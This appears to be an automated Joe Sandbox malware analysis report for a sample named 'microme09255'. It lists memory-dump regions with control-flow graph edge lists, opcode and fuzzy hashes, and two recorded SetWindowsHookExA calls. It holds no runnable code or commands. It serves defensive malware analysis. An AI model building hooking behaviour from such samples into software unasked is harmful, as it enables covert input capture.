                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b898624b1de791b5fce91c938d8256bba09b5088551f10d012e4ed246a2c2c68
                                                                                                                                      • Instruction ID: 2ca67aa538beac816f9d38e7fa0e4caf35f693300dc2a77876e7898e5e1ec59d
                                                                                                                                      • Opcode Fuzzy Hash: b898624b1de791b5fce91c938d8256bba09b5088551f10d012e4ed246a2c2c68
                                                                                                                                      • Instruction Fuzzy Hash: 5DA20434A002188FDB25DB68C588B9DBBF2FB49314F5584AAE449EB361DB35ED81CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3075 39f360-39f381 3076 39f383-39f386 3075->3076 3077 39f38c-39f3ab 3076->3077 3078 39fb27-39fb2a 3076->3078 3087 39f3ad-39f3b0 3077->3087 3088 39f3c4-39f3ce 3077->3088 3079 39fb2c-39fb4b 3078->3079 3080 39fb50-39fb52 3078->3080 3079->3080 3082 39fb59-39fb5c 3080->3082 3083 39fb54 3080->3083 3082->3076 3085 39fb62-39fb6b 3082->3085 3083->3082 3087->3088 3090 39f3b2-39f3c2 3087->3090 3093 39f3d4-39f3ef call 3964dc 3088->3093 3090->3093 3096 39f3fc-39f6d9 3093->3096 3097 39f3f1-39f3f7 3093->3097 3118 39fb19-39fb26 3096->3118 3119 39f6df-39f78e 3096->3119 3097->3085 3128 39f790-39f7b5 3119->3128 3129 39f7b7 3119->3129 3131 39f7c0-39f7c9 call 3964e8 3128->3131 3129->3131 3133 39f7ce-39f7d3 3131->3133 3134 39f7d9-39f7fb call 3964f4 3133->3134 3135 39fb00-39fb0c 3133->3135 3134->3135 3139 39f801-39f80b 3134->3139 3135->3119 3136 39fb12 3135->3136 3136->3118 3139->3135 3140 39f811-39f81c 3139->3140 3140->3135 3141 39f822-39f8f8 call 390174 * 2 3140->3141 3155 39f8fa-39f8fc 3141->3155 3156 39f906-39f936 call 390174 3141->3156 3155->3156 3161 39f938-39f93a 3156->3161 3162 39f944-39f950 3156->3162 3161->3162 3163 39f9b0-39f9b4 3162->3163 3164 39f952-39f956 3162->3164 3165 39f9ba-39f9f6 call 390174 3163->3165 3166 39faf1-39fafa 3163->3166 3164->3163 3167 39f958-39f982 call 390174 3164->3167 3180 39f9f8-39f9fa 3165->3180 3181 39fa04-39fa12 3165->3181 3166->3135 3166->3141 3176 39f990-39f9ad call 396500 3167->3176 3177 39f984-39f986 3167->3177 3176->3163 3177->3176 3180->3181 3184 39fa29-39fa34 3181->3184 3185 39fa14-39fa1f 3181->3185 3189 39fa4c-39fa5d 3184->3189 3190 39fa36-39fa3c 3184->3190 3185->3184 3188 39fa21 3185->3188 3188->3184 3194 39fa5f-39fa65 3189->3194 3195 39fa75-39fa81 3189->3195 3191 39fa3e 3190->3191 3192 39fa40-39fa42 3190->3192 3191->3189 3192->3189 3196 39fa69-39fa6b 3194->3196 3197 39fa67 3194->3197 3199 39fa99-39faea 3195->3199 3200 39fa83-39fa89 3195->3200 3196->3195 3197->3195 3199->3166 3201 39fa8b 3200->3201 3202 39fa8d-39fa8f 3200->3202 3201->3199 3202->3199
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 920ae77abd9865ae8afb5d00abd51186940e26961f19845e1d49cba095c29426
                                                                                                                                      • Instruction ID: 9bfddc869b33a0410af4d0573233b7d2322e630f90bea54efd43089309194fba
                                                                                                                                      • Opcode Fuzzy Hash: 920ae77abd9865ae8afb5d00abd51186940e26961f19845e1d49cba095c29426
                                                                                                                                      • Instruction Fuzzy Hash: D1323F30E106198FCF15EF75D89559DB7B6BFC9300F21C66AE409AB254EB70AE81CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3529 394518-39457e 3531 3945c8-3945ca 3529->3531 3532 394580-39458b 3529->3532 3533 3945cc-3945e5 3531->3533 3532->3531 3534 39458d-394599 3532->3534 3541 394631-394633 3533->3541 3542 3945e7-3945f3 3533->3542 3535 39459b-3945a5 3534->3535 3536 3945bc-3945c6 3534->3536 3537 3945a9-3945b8 3535->3537 3538 3945a7 3535->3538 3536->3533 3537->3537 3540 3945ba 3537->3540 3538->3537 3540->3536 3543 394635-39464d 3541->3543 3542->3541 3544 3945f5-394601 3542->3544 3550 39464f-39465a 3543->3550 3551 394697-394699 3543->3551 3545 394603-39460d 3544->3545 3546 394624-39462f 3544->3546 3548 39460f 3545->3548 3549 394611-394620 3545->3549 3546->3543 3548->3549 3549->3549 3552 394622 3549->3552 3550->3551 3553 39465c-394668 3550->3553 3554 39469b-3946b3 3551->3554 3552->3546 3555 39468b-394695 3553->3555 3556 39466a-394674 3553->3556 3561 3946fd-3946ff 3554->3561 3562 3946b5-3946c0 3554->3562 3555->3554 3557 394678-394687 3556->3557 3558 394676 3556->3558 3557->3557 3560 394689 3557->3560 3558->3557 3560->3555 3563 394701-394774 3561->3563 3562->3561 3564 3946c2-3946ce 3562->3564 3573 39477a-394788 3563->3573 3565 3946f1-3946fb 3564->3565 3566 3946d0-3946da 3564->3566 3565->3563 3567 3946dc 3566->3567 3568 3946de-3946ed 3566->3568 3567->3568 3568->3568 3570 3946ef 3568->3570 3570->3565 3574 39478a-394790 3573->3574 3575 394791-3947f1 3573->3575 3574->3575 3582 394801-394805 3575->3582 3583 3947f3-3947f7 3575->3583 3584 394815-394819 3582->3584 3585 394807-39480b 3582->3585 3583->3582 3586 3947f9 3583->3586 3588 394829-39482d 3584->3588 3589 39481b-39481f 3584->3589 3585->3584 3587 39480d 3585->3587 3586->3582 3587->3584 3591 39483d-394841 3588->3591 3592 39482f-394833 3588->3592 3589->3588 3590 394821 3589->3590 3590->3588 3594 394851-394855 3591->3594 3595 394843-394847 3591->3595 3592->3591 3593 394835 3592->3593 3593->3591 3596 394865 3594->3596 3597 394857-39485b 3594->3597 3595->3594 3598 394849-39484c call 390ab8 3595->3598 3602 394866 3596->3602 3597->3596 3599 39485d-394860 call 390ab8 3597->3599 3598->3594 3599->3596 3602->3602
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c9c7baecdab96ddbd70c5772c0ecb150b2a0864b10b374904c5a077847607acd
                                                                                                                                      • Instruction ID: 4a1c4c000256c791413006de40b9329b55579f1e1290014a2c59ccd0fd665f92
                                                                                                                                      • Opcode Fuzzy Hash: c9c7baecdab96ddbd70c5772c0ecb150b2a0864b10b374904c5a077847607acd
                                                                                                                                      • Instruction Fuzzy Hash: F9B17170E10209CFDF15CFA9C885BDDBBF2AF89314F158529E814E7294EB759846CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3767 393900-393966 3769 393968-393973 3767->3769 3770 3939b0-3939b2 3767->3770 3769->3770 3771 393975-393981 3769->3771 3772 3939b4-393a0c 3770->3772 3773 393983-39398d 3771->3773 3774 3939a4-3939ae 3771->3774 3781 393a0e-393a19 3772->3781 3782 393a56-393a58 3772->3782 3775 39398f 3773->3775 3776 393991-3939a0 3773->3776 3774->3772 3775->3776 3776->3776 3778 3939a2 3776->3778 3778->3774 3781->3782 3783 393a1b-393a27 3781->3783 3784 393a5a-393a72 3782->3784 3785 393a29-393a33 3783->3785 3786 393a4a-393a54 3783->3786 3791 393abc-393abe 3784->3791 3792 393a74-393a7f 3784->3792 3787 393a35 3785->3787 3788 393a37-393a46 3785->3788 3786->3784 3787->3788 3788->3788 3790 393a48 3788->3790 3790->3786 3794 393ac0-393b0e 3791->3794 3792->3791 3793 393a81-393a8d 3792->3793 3795 393a8f-393a99 3793->3795 3796 393ab0-393aba 3793->3796 3802 393b14-393b22 3794->3802 3797 393a9b 3795->3797 3798 393a9d-393aac 3795->3798 3796->3794 3797->3798 3798->3798 3800 393aae 3798->3800 3800->3796 3803 393b2b-393b8b 3802->3803 3804 393b24-393b2a 3802->3804 3811 393b9b-393b9f 3803->3811 3812 393b8d-393b91 3803->3812 3804->3803 3814 393baf-393bb3 3811->3814 3815 393ba1-393ba5 3811->3815 3812->3811 3813 393b93 3812->3813 3813->3811 3817 393bc3-393bc7 3814->3817 3818 393bb5-393bb9 3814->3818 3815->3814 3816 393ba7-393baa call 390ab8 3815->3816 3816->3814 3821 393bc9-393bcd 3817->3821 3822 393bd7-393bdb 3817->3822 3818->3817 3820 393bbb-393bbe call 390ab8 3818->3820 3820->3817 3821->3822 3824 393bcf-393bd2 call 390ab8 3821->3824 3825 393beb-393bef 3822->3825 3826 393bdd-393be1 3822->3826 3824->3822 3829 393bff 3825->3829 3830 393bf1-393bf5 3825->3830 3826->3825 3828 393be3 3826->3828 3828->3825 3832 393c00 3829->3832 3830->3829 3831 393bf7 3830->3831 3831->3829 3832->3832
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6177c3393a1a7723088ede93a62f5ecf7064aa1a17eabe5d651bc497874a5632
                                                                                                                                      • Instruction ID: 38599f98bc579a6b7d0c2e156a60ff3a28ea54d1bcb82266b07716722073fc86
                                                                                                                                      • Opcode Fuzzy Hash: 6177c3393a1a7723088ede93a62f5ecf7064aa1a17eabe5d651bc497874a5632
                                                                                                                                      • Instruction Fuzzy Hash: AE917EB0E00209CFDF15DFA9C8857DEBBF2AF88314F148529E405AB250DB749E45CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1204 929ff0-92a042 1206 92a044-92a04c 1204->1206 1207 92a04e-92a080 SetWindowsHookExA 1204->1207 1206->1207 1208 92a082-92a088 1207->1208 1209 92a089-92a0a9 1207->1209 1208->1209
                                                                                                                                      APIs
                                                                                                                                      • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0092A073
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883806168.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_920000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HookWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2559412058-0
                                                                                                                                      • Opcode ID: 8914cba459f1f7b2cd52d6e2847e381bf61a5a143539ae9f55f0ff61540bc62b
                                                                                                                                      • Instruction ID: 1010d7f89495766346c758271be0f10221eb63258af16308c9b685acbc570ec2
                                                                                                                                      • Opcode Fuzzy Hash: 8914cba459f1f7b2cd52d6e2847e381bf61a5a143539ae9f55f0ff61540bc62b
                                                                                                                                      • Instruction Fuzzy Hash: C2213775D002588FCB11DF99D888BEEBBF5EF89310F20841AD415A7290C774A944CFA6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1213 929ff8-92a042 1215 92a044-92a04c 1213->1215 1216 92a04e-92a080 SetWindowsHookExA 1213->1216 1215->1216 1217 92a082-92a088 1216->1217 1218 92a089-92a0a9 1216->1218 1217->1218
                                                                                                                                      APIs
                                                                                                                                      • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0092A073
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883806168.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_920000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HookWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2559412058-0
                                                                                                                                      • Opcode ID: fb5b80cb5b55dd33647bec415a790d0300dc15045db3f6734c668e9e2c4d4362
                                                                                                                                      • Instruction ID: 17e7df5dbf23e0b1b036846fd0a479ef666123b5e3f8baa55a1040f430568856
                                                                                                                                      • Opcode Fuzzy Hash: fb5b80cb5b55dd33647bec415a790d0300dc15045db3f6734c668e9e2c4d4362
                                                                                                                                      • Instruction Fuzzy Hash: 7D21F775D002199FCB14DF9AD848BEEFBF5FB89310F20841AE415A7250C774A944CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1350 39e3bd-39e3eb 1351 39e3ed-39e3f0 1350->1351 1352 39e413-39e415 1351->1352 1353 39e3f2-39e40e 1351->1353 1354 39e41c-39e41f 1352->1354 1355 39e417 1352->1355 1353->1352 1354->1351 1357 39e421-39e447 1354->1357 1355->1354 1362 39e44e-39e47c 1357->1362 1367 39e47e-39e488 1362->1367 1368 39e4f3-39e517 1362->1368 1372 39e48a-39e490 1367->1372 1373 39e4a0-39e4f1 1367->1373 1374 39e519 1368->1374 1375 39e521 1368->1375 1376 39e492 1372->1376 1377 39e494-39e496 1372->1377 1373->1367 1373->1368 1374->1375 1376->1373 1377->1373
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :
                                                                                                                                      • API String ID: 0-336475711
                                                                                                                                      • Opcode ID: b9396d6072a943d31b23c2be3967bb26277ae3a254f0d2996543277dd1e8613d
                                                                                                                                      • Instruction ID: 4a8d6227c90d7d73e070045f479a458cd49924d432088a6430f9ca90bdf8401e
                                                                                                                                      • Opcode Fuzzy Hash: b9396d6072a943d31b23c2be3967bb26277ae3a254f0d2996543277dd1e8613d
                                                                                                                                      • Instruction Fuzzy Hash: 2D41B1307002408FDF16AB39D49966E7BA3AB89310F25496ED406DB396DF39DD02CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 2567 396590-3965cf 2571 3965d1-3965d4 2567->2571 2572 396601-396604 2571->2572 2573 3965d6-3965fc 2571->2573 2574 396631-396634 2572->2574 2575 396606-39662c 2572->2575 2573->2572 2576 396661-396664 2574->2576 2577 396636-39665c 2574->2577 2575->2574 2579 396671-396674 2576->2579 2580 396666 2576->2580 2577->2576 2582 3966a1-3966a4 2579->2582 2583 396676-39669c 2579->2583 2589 39666c 2580->2589 2587 3966d1-3966d4 2582->2587 2588 3966a6-3966cc 2582->2588 2583->2582 2590 3966f1-3966f4 2587->2590 2591 3966d6-3966ec 2587->2591 2588->2587 2589->2579 2596 396721-396724 2590->2596 2597 3966f6-39671c 2590->2597 2591->2590 2602 396751-396754 2596->2602 2603 396726-39674c 2596->2603 2597->2596 2604 396781-396784 2602->2604 2605 396756-39677c 2602->2605 2603->2602 2611 396795-396798 2604->2611 2612 396786-396788 2604->2612 2605->2604 2613 39679a-3967c0 2611->2613 2614 3967c5-3967c8 2611->2614 2784 39678a call 397e01 2612->2784 2785 39678a call 397e10 2612->2785 2786 39678a call 397eb3 2612->2786 2613->2614 2620 3967ca-3967f0 2614->2620 2621 3967f5-3967f8 2614->2621 2618 396790 2618->2611 2620->2621 2622 3967fa-396820 2621->2622 2623 396825-396828 2621->2623 2622->2623 2628 39682a-396850 2623->2628 2629 396855-396858 2623->2629 2628->2629 2631 39685a-396880 2629->2631 2632 396885-396888 2629->2632 2631->2632 2636 39688a-3968b0 2632->2636 2637 3968b5-3968b8 2632->2637 2636->2637 2640 3968ba-3968e0 2637->2640 2641 3968e5-3968e8 2637->2641 2640->2641 2646 3968ea-396910 2641->2646 2647 396915-396918 2641->2647 2646->2647 2650 39691a-396940 2647->2650 2651 396945-396948 2647->2651 2650->2651 2656 39694a-396970 2651->2656 2657 396975-396978 2651->2657 2656->2657 2660 39697a-3969a0 2657->2660 2661 3969a5-3969a8 2657->2661 2660->2661 2666 3969aa-3969d0 2661->2666 2667 3969d5-3969d8 2661->2667 2666->2667 2670 3969da-396a00 2667->2670 2671 396a05-396a08 2667->2671 2670->2671 2676 396a0a-396a30 2671->2676 2677 396a35-396a38 2671->2677 2676->2677 2680 396a3a-396a60 2677->2680 2681 396a65-396a68 2677->2681 2680->2681 2686 396a6a-396a90 2681->2686 2687 396a95-396a98 2681->2687 2686->2687 2690 396a9a-396ac0 2687->2690 2691 396ac5-396ac8 2687->2691 2690->2691 2696 396aca-396af0 2691->2696 2697 396af5-396af8 2691->2697 2696->2697 2700 396afa-396b20 2697->2700 2701 396b25-396b28 2697->2701 2700->2701 2706 396b2a-396b50 2701->2706 2707 396b55-396b58 2701->2707 2706->2707 2710 396b5a-396b80 2707->2710 2711 396b85-396b88 2707->2711 2710->2711 2716 396b8a-396bb0 2711->2716 2717 396bb5-396bb8 2711->2717 2716->2717 2720 396bba-396be0 2717->2720 2721 396be5-396be8 2717->2721 2720->2721 2726 396bea-396c10 2721->2726 2727 396c15-396c18 2721->2727 2726->2727 2730 396c1a-396c40 2727->2730 2731 396c45-396c48 2727->2731 2730->2731 2736 396c4a-396c70 2731->2736 2737 396c75-396c78 2731->2737 2736->2737 2740 396c7a-396ca0 2737->2740 2741 396ca5-396ca8 2737->2741 2740->2741 2746 396caa-396cd0 2741->2746 2747 396cd5-396cd8 2741->2747 2746->2747 2750 396cda-396d00 2747->2750 2751 396d05-396d08 2747->2751 2750->2751 2756 396d0a-396d30 2751->2756 2757 396d35-396d38 2751->2757 2756->2757 2760 396d3a-396d4e 2757->2760 2761 396d53-396d56 2757->2761 2760->2761 2766 396d58-396d7e 2761->2766 2767 396d83-396d85 2761->2767 2766->2767 2770 396d8c-396d8f 2767->2770 2771 396d87 2767->2771 2770->2571 2776 396d95-396d9b 2770->2776 2771->2770 2784->2618 2785->2618 2786->2618
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fc19f09e7e9ea1f9d6a9c16dff3851ba1dac4c1c3c24204f61a93c19edbb2ce1
                                                                                                                                      • Instruction ID: f1222f7fec4bc16b25082714b492cb76ee0a328df1e1d5de35c27ff7541bd5df
                                                                                                                                      • Opcode Fuzzy Hash: fc19f09e7e9ea1f9d6a9c16dff3851ba1dac4c1c3c24204f61a93c19edbb2ce1
                                                                                                                                      • Instruction Fuzzy Hash: B7224B3471030ACBDF29AB28E59666832A2FBC5306B608939E005DB354DF75ED87DBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3382 398028-398047 3383 398049-39804c 3382->3383 3384 39804e-398053 3383->3384 3385 398056-398059 3383->3385 3384->3385 3386 39805f-398062 3385->3386 3387 39835e-398367 3385->3387 3388 398085-398088 3386->3388 3389 398064-398080 3386->3389 3390 3980d8-3980e1 3387->3390 3391 39836d-398377 3387->3391 3394 39808a-3980b8 3388->3394 3395 3980bd-3980c0 3388->3395 3389->3388 3392 39837a-3983aa 3390->3392 3393 3980e7-3980ee 3390->3393 3404 3983ac-3983af 3392->3404 3399 3980f3-3980f6 3393->3399 3394->3395 3396 3980d3-3980d6 3395->3396 3397 3980c2 3395->3397 3396->3390 3396->3399 3523 3980c5 call 398028 3397->3523 3524 3980c5 call 398388 3397->3524 3525 3980c5 call 39833e 3397->3525 3526 3980c5 call 398140 3397->3526 3527 3980c5 call 398390 3397->3527 3528 3980c5 call 398585 3397->3528 3401 3980f8-398107 3399->3401 3402 398112-398114 3399->3402 3416 39835b 3401->3416 3417 39810d 3401->3417 3407 39811b-39811e 3402->3407 3408 398116 3402->3408 3411 3983b5-3983b8 3404->3411 3412 398534-39853e 3404->3412 3405 3980cb-3980ce 3405->3396 3407->3383 3410 398124-39814c call 398960 3407->3410 3408->3407 3520 39814f call 39be78 3410->3520 3521 39814f call 39be88 3410->3521 3522 39814f call 39bf50 3410->3522 3414 3983ba-3983c8 3411->3414 3415 3983d3-3983d6 3411->3415 3427 398489-3984ab 3414->3427 3428 3983ce 3414->3428 3419 3983e8-3983eb 3415->3419 3420 3983d8 3415->3420 3416->3387 3417->3402 3422 3983ed-398405 3419->3422 3423 398410-398413 3419->3423 3429 3983e0-3983e3 3420->3429 3440 39840b 3422->3440 3441 39851a-39851d 3422->3441 3424 398433-398436 3423->3424 3425 398415-39842e 3423->3425 3431 398438-39843b 3424->3431 3432 398457-398460 3424->3432 3425->3424 3428->3415 3429->3419 3436 39843d-398440 3431->3436 3437 398445-398448 3431->3437 3438 39846c-398475 3432->3438 3439 398462 3432->3439 3436->3437 3445 39844a-39844f 3437->3445 3446 398452-398455 3437->3446 3442 39847b-39847f 3438->3442 3443 39853f-398553 3438->3443 3447 398467-39846a 3439->3447 3440->3423 3448 398522-398524 3441->3448 3451 398484-398487 3442->3451 3444 398155-398157 3444->3416 3454 39815d-39816b 3444->3454 3445->3446 3446->3432 3446->3447 3447->3438 3447->3451 3449 39852b-39852e 3448->3449 3450 398526 3448->3450 3449->3404 3449->3412 3450->3449 3451->3427 3455 3984ac-3984af 3451->3455 3454->3416 3462 398171-3981ce 3454->3462 3458 3984ce-3984d1 3455->3458 3459 3984b1-3984c9 3455->3459 3460 3984f0-3984f3 3458->3460 3461 3984d3-3984eb 3458->3461 3459->3458 3463 398515-398518 3460->3463 3464 3984f5-398510 3460->3464 3461->3460 3476 39829f-3982b9 3462->3476 3477 3981d4-398227 3462->3477 3463->3441 3463->3448 3464->3463 3482 3982bb-3982bf 3476->3482 3495 398229-398245 3477->3495 3496 398247-39826a call 390d10 3477->3496 3483 3982c1-3982ce 3482->3483 3484 3982d0 3482->3484 3486 3982d5-3982d7 3483->3486 3484->3486 3487 3982d9-3982db 3486->3487 3488 398343-398355 3486->3488 3490 3982e9 3487->3490 3491 3982dd-3982e7 3487->3491 3488->3416 3488->3462 3493 3982ee-3982f0 3490->3493 3491->3493 3493->3488 3497 3982f2-3982f4 3493->3497 3508 39826c-39829d 3495->3508 3496->3508 3497->3488 3498 3982f6-39833c 3497->3498 3498->3488 3508->3482 3520->3444 3521->3444 3522->3444 3523->3405 3524->3405 3525->3405 3526->3405 3527->3405 3528->3405
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 840f1a3836f70615f3a015e650d7fbe03a6370fe13fe99d397804e55f46232cf
                                                                                                                                      • Instruction ID: 092f893460f1a41c9194a5f55f3c323e65d4a37d5d04b41fbd924ca6e0f73e59
                                                                                                                                      • Opcode Fuzzy Hash: 840f1a3836f70615f3a015e650d7fbe03a6370fe13fe99d397804e55f46232cf
                                                                                                                                      • Instruction Fuzzy Hash: 45D13D35A002048FDF15DF68D885AAEBBB2EF89310F15846AE806DB3A5DF35ED45CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3603 395088-3950a0 3604 3950a2-3950a5 3603->3604 3605 3950b4-3950b7 3604->3605 3606 3950a7-3950ad 3604->3606 3607 3950b9-3950c0 3605->3607 3609 3950ee-3950f1 3605->3609 3606->3607 3608 3950af 3606->3608 3610 3950c2-3950c6 3607->3610 3611 3950c7-3950e7 3607->3611 3608->3605 3609->3606 3612 3950f3-3950f6 3609->3612 3610->3611 3613 3950e9 3611->3613 3614 39512c-39512f 3611->3614 3615 3950f8-395118 3612->3615 3616 39511d-395120 3612->3616 3613->3609 3619 3951fa-395224 3614->3619 3620 395135-39515b 3614->3620 3615->3616 3617 395122-395124 3616->3617 3618 395127-39512a 3616->3618 3617->3618 3618->3614 3622 395160-395163 3618->3622 3630 395226-395228 3619->3630 3620->3622 3623 39517a-39517d 3622->3623 3624 395165-395175 3622->3624 3628 39517f-395180 3623->3628 3629 395185-395188 3623->3629 3624->3623 3628->3629 3632 3951bb-3951bd 3629->3632 3633 39518a-39519e 3629->3633 3635 39522a 3630->3635 3636 39522f-395232 3630->3636 3637 3951bf 3632->3637 3638 3951c4-3951c7 3632->3638 3645 3951a0-3951a2 3633->3645 3646 3951a4 3633->3646 3635->3636 3636->3630 3639 395234-395241 3636->3639 3637->3638 3638->3604 3641 3951cd-3951eb 3638->3641 3648 395259-3952cf call 394acc call 394adc call 394aec 3639->3648 3649 395243-395249 3639->3649 3659 3951f2-3951f9 3641->3659 3650 3951a7-3951b6 3645->3650 3646->3650 3669 3952d1-3952da 3648->3669 3670 3952f2 3648->3670 3651 39524b 3649->3651 3652 39524d-39524f 3649->3652 3650->3632 3651->3648 3652->3648 3672 3952dc-3952df 3669->3672 3673 3952e1-3952ee 3669->3673 3671 3952f5-39530c 3670->3671 3678 39530e-395336 call 390b34 3671->3678 3679 395366-39539b 3671->3679 3674 3952f0 3672->3674 3673->3674 3674->3671 3688 39533c-395358 3678->3688 3681 39539d 3679->3681 3682 3953a6 3679->3682 3681->3682 3684 3953a7 3682->3684 3684->3684 3690 39535a 3688->3690 3691 395363 3688->3691 3690->3691 3691->3679
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fdf57f1d50e283e82ae6f8ca15d5fb0492af185be5a98b769b3a86a5185af3c0
                                                                                                                                      • Instruction ID: 07647126c2d7f970bc6ef555e40cb83617c3e6055fc56c8ffb5f51971461402c
                                                                                                                                      • Opcode Fuzzy Hash: fdf57f1d50e283e82ae6f8ca15d5fb0492af185be5a98b769b3a86a5185af3c0
                                                                                                                                      • Instruction Fuzzy Hash: 34916C34B106158FDF16DB68C498BAE77B6EF89300F214569E406DB3A1DB75EC81CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8d88f9285f608f28a1a802168480089063195587ffe91680c085b1d37f3a729
                                                                                                                                      • Instruction ID: 0d4f88f780e92557c44685afdd03b7aa2ef9abafb2e47bfd4dc4196268de0882
                                                                                                                                      • Opcode Fuzzy Hash: e8d88f9285f608f28a1a802168480089063195587ffe91680c085b1d37f3a729
